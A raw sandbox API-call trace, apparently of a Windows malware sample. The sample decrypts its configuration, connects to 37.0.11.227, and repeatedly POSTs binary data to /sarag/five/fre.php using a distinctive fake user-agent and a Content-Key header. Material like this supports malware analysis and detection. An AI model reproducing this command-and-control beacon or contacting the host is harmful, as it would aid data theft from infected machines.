LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.081] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0297.088] GetProcessHeap () returned 0x690000 [0297.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0297.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.089] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0297.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.089] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.090] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.090] GetProcessHeap () returned 0x690000 [0297.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0297.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.092] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0297.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.092] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0297.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.093] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0297.093] GetProcessHeap () returned 0x690000 [0297.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0297.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.094] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.095] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.096] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.097] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.097] GetProcessHeap () returned 0x690000 [0297.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0297.097] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.097] GetProcessHeap () returned 0x690000 [0297.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0297.103] GetProcessHeap () returned 0x690000 [0297.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0297.105] GetProcessHeap () returned 0x690000 [0297.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0297.106] GetProcessHeap () returned 0x690000 [0297.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0297.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0297.123] GetProcessHeap () returned 0x690000 [0297.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0297.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.124] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0297.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.125] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.126] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.126] GetProcessHeap () returned 0x690000 [0297.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0297.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.128] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0297.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.129] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0297.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.130] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0297.130] GetProcessHeap () returned 0x690000 [0297.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.131] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0297.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0297.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0297.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0297.134] GetProcessHeap () returned 0x690000 [0297.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0297.134] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0297.134] GetProcessHeap () returned 0x690000 [0297.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0297.134] socket (af=2, type=1, protocol=6) returned 0x9ac [0297.134] connect (s=0x9ac, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0297.175] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0297.183] GetProcessHeap () returned 0x690000 [0297.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0297.183] GetProcessHeap () returned 0x690000 [0297.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0297.184] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.185] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.185] GetProcessHeap () returned 0x690000 [0297.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0297.185] GetProcessHeap () returned 0x690000 [0297.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.186] GetProcessHeap () returned 0x690000 [0297.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0297.186] GetProcessHeap () returned 0x690000 [0297.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0297.186] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.187] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.187] GetProcessHeap () returned 0x690000 [0297.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0297.187] GetProcessHeap () returned 0x690000 [0297.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.188] send (s=0x9ac, buf=0x6ad508*, len=242, flags=0) returned 242 [0297.188] send (s=0x9ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0297.188] GetProcessHeap () returned 0x690000 [0297.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0297.188] recv (in: s=0x9ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0297.278] GetProcessHeap () returned 0x690000 [0297.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0297.279] GetProcessHeap () returned 0x690000 [0297.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0297.279] GetProcessHeap () returned 0x690000 [0297.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0297.280] GetProcessHeap () returned 0x690000 [0297.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0297.280] closesocket (s=0x9ac) returned 0 [0297.281] GetProcessHeap () returned 0x690000 [0297.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0297.281] GetProcessHeap () returned 0x690000 [0297.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.281] GetProcessHeap () returned 0x690000 [0297.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0297.281] GetProcessHeap () returned 0x690000 [0297.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0297.295] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1378) returned 0x9ac [0297.297] Sleep (dwMilliseconds=0xea60) [0297.299] GetProcessHeap () returned 0x690000 [0297.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0297.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0297.327] GetProcessHeap () returned 0x690000 [0297.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0297.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.331] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0297.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.332] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.334] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.334] GetProcessHeap () returned 0x690000 [0297.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0297.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.336] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0297.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.337] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0297.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.339] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0297.339] GetProcessHeap () returned 0x690000 [0297.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.340] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.341] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.342] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.344] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.344] GetProcessHeap () returned 0x690000 [0297.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0297.344] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.344] GetProcessHeap () returned 0x690000 [0297.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0297.345] GetProcessHeap () returned 0x690000 [0297.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.345] GetProcessHeap () returned 0x690000 [0297.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0297.345] GetProcessHeap () returned 0x690000 [0297.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0297.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.347] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.355] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0297.364] GetProcessHeap () returned 0x690000 [0297.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0297.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.371] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0297.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.374] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.375] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.375] GetProcessHeap () returned 0x690000 [0297.376] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0297.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.377] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0297.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.378] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0297.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.380] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0297.380] GetProcessHeap () returned 0x690000 [0297.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0297.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.381] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0297.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.382] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0297.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.383] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0297.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0297.385] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0297.385] GetProcessHeap () returned 0x690000 [0297.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0297.385] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0297.385] GetProcessHeap () returned 0x690000 [0297.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0297.385] socket (af=2, type=1, protocol=6) returned 0x9b0 [0297.385] connect (s=0x9b0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0297.427] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0297.440] GetProcessHeap () returned 0x690000 [0297.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0297.441] GetProcessHeap () returned 0x690000 [0297.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0297.444] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.444] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.444] GetProcessHeap () returned 0x690000 [0297.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0297.445] GetProcessHeap () returned 0x690000 [0297.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.445] GetProcessHeap () returned 0x690000 [0297.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0297.445] GetProcessHeap () returned 0x690000 [0297.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0297.446] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0297.447] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.447] GetProcessHeap () returned 0x690000 [0297.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0297.447] GetProcessHeap () returned 0x690000 [0297.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0297.448] send (s=0x9b0, buf=0x6ad508*, len=242, flags=0) returned 242 [0297.449] send (s=0x9b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0297.449] GetProcessHeap () returned 0x690000 [0297.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0297.449] recv (in: s=0x9b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0297.522] GetProcessHeap () returned 0x690000 [0297.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0297.522] GetProcessHeap () returned 0x690000 [0297.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0297.523] GetProcessHeap () returned 0x690000 [0297.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0297.523] GetProcessHeap () returned 0x690000 [0297.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0297.523] closesocket (s=0x9b0) returned 0 [0297.524] GetProcessHeap () returned 0x690000 [0297.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0297.524] GetProcessHeap () returned 0x690000 [0297.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.525] GetProcessHeap () returned 0x690000 [0297.525] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0297.525] GetProcessHeap () returned 0x690000 [0297.526] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0297.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1300) returned 0x9b0 [0297.530] Sleep (dwMilliseconds=0xea60) [0297.531] GetProcessHeap () returned 0x690000 [0297.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0297.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.532] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.541] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0297.547] GetProcessHeap () returned 0x690000 [0297.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0297.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.548] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0297.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.549] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0297.550] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.550] 